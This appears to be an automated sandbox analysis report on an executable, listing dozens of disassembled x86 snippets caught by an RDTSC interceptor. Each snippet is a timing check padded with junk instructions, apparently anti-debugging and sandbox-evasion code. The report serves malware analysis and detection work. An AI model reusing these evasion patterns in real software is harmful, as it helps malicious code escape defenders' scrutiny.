                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2D3E second address: FC2D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4B9132D698h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp+122D2D5Ch] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d jl 00007F4B9132D696h 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2D7D second address: FC2D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4B90BE6226h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2D87 second address: FC2D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2F57 second address: FC2F5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3788 second address: FC378D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC385D second address: FC3867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4B90BE6226h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3867 second address: FC387A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4B9132D698h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC387A second address: FC38CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2E77h], ecx 0x00000011 mov dh, E1h 0x00000013 lea eax, dword ptr [ebp+124872BEh] 0x00000019 jmp 00007F4B90BE622Ch 0x0000001e nop 0x0000001f jng 00007F4B90BE623Dh 0x00000025 jmp 00007F4B90BE6237h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e jl 00007F4B90BE6226h 0x00000034 pop ecx 0x00000035 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC38CA second address: FC393F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F4B9132D698h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 cld 0x00000025 lea eax, dword ptr [ebp+1248727Ah] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F4B9132D698h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov di, bx 0x00000048 jo 00007F4B9132D69Ch 0x0000004e mov ecx, dword ptr [ebp+122D2C1Ch] 0x00000054 or edi, dword ptr [ebp+122D2BFCh] 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC393F second address: FC3946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006F91 second address: 1006FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A5h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006FAA second address: 1006FB6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006FB6 second address: 1006FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006FC2 second address: 1006FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007165 second address: 1007179 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B9132D69Eh 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007179 second address: 10071A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6235h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE622Dh 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10072D1 second address: 10072EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4B9132D6A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007496 second address: 100749E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100749E second address: 10074A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D34C second address: 100D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 ja 00007F4B90BE6226h 0x0000000c pop edi 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D359 second address: 100D372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D6A3h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100D372 second address: 100D37F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80659 second address: F8067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F4B9132D6ACh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4B9132D6A4h 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BE95 second address: 100BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BE9B second address: 100BEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BEA0 second address: 100BEBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BEBE second address: 100BEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BFE3 second address: 100BFEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C3E7 second address: 100C3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C3F4 second address: 100C407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C407 second address: 100C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jbe 00007F4B9132D6AFh 0x0000001a jmp 00007F4B9132D6A7h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C445 second address: 100C44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C44B second address: 100C466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A7h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA02 second address: 100CA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA06 second address: 100CA1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F4B9132D696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F4B9132D6B4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA1D second address: 100CA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6238h 0x00000009 pushad 0x0000000a jmp 00007F4B90BE622Fh 0x0000000f jno 00007F4B90BE6226h 0x00000015 popad 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA50 second address: 100CA58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA58 second address: 100CA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6232h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA6E second address: 100CA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F4B9132D696h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CBB9 second address: 100CBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4B90BE6226h 0x0000000a push ebx 0x0000000b jmp 00007F4B90BE622Bh 0x00000010 jmp 00007F4B90BE622Fh 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4B90BE6235h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101062E second address: 1010639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4B9132D696h 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010639 second address: 101063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101346E second address: 1013496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4B9132D69Ah 0x0000000e jmp 00007F4B9132D6A5h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013496 second address: 101349C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101349C second address: 10134A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012D8B second address: 1012D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4B90BE6226h 0x0000000a popad 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013045 second address: 101304F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101304F second address: 1013055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013055 second address: 1013059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101319A second address: 10131AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE622Dh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10131AF second address: 10131B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10131B4 second address: 10131BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10159A3 second address: 10159A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10170B3 second address: 10170D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10170D2 second address: 10170D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A212 second address: 101A21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4B90BE622Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019BA3 second address: 1019BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4B9132D6A9h 0x0000000b pushad 0x0000000c jne 00007F4B9132D696h 0x00000012 jmp 00007F4B9132D6A7h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019EB4 second address: 1019EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 jbe 00007F4B90BE623Bh 0x0000000d jmp 00007F4B90BE622Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019EE6 second address: 1019EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019EF1 second address: 1019EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1019EF7 second address: 1019F01 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E73D second address: 101E755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4B90BE622Ch 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E755 second address: 101E778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4B9132D696h 0x0000000a jmp 00007F4B9132D6A6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E778 second address: 101E782 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6232h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E782 second address: 101E788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EA0F second address: 101EA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EA15 second address: 101EA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007F4B9132D6A8h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EA3A second address: 101EA4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4B90BE6226h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EBCA second address: 101EBCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EBCF second address: 101EBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EBD5 second address: 101EBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EBDB second address: 101EBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F4B90BE6226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023230 second address: 1023234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10239A8 second address: 10239B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10239B0 second address: 10239B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023AFD second address: 1023B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6234h 0x00000007 jnl 00007F4B90BE6226h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F4B90BE6235h 0x00000018 jmp 00007F4B90BE622Fh 0x0000001d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102AB0D second address: 102AB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B055 second address: 102B06A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B90BE6226h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B06A second address: 102B06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BF77 second address: 102BF84 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BF84 second address: 102BFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D6A8h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030D24 second address: 1030D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030D28 second address: 1030D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D6A9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035DD4 second address: 1035DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035DD8 second address: 1035DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035DDE second address: 1035DE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035DE5 second address: 1035DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035DEE second address: 1035DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035454 second address: 1035462 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F4B9132D696h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10355D2 second address: 10355E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE622Ah 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10355E0 second address: 10355E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035752 second address: 1035758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035758 second address: 103575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103575C second address: 1035760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10359A1 second address: 10359B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Fh 0x00000009 rdtsc
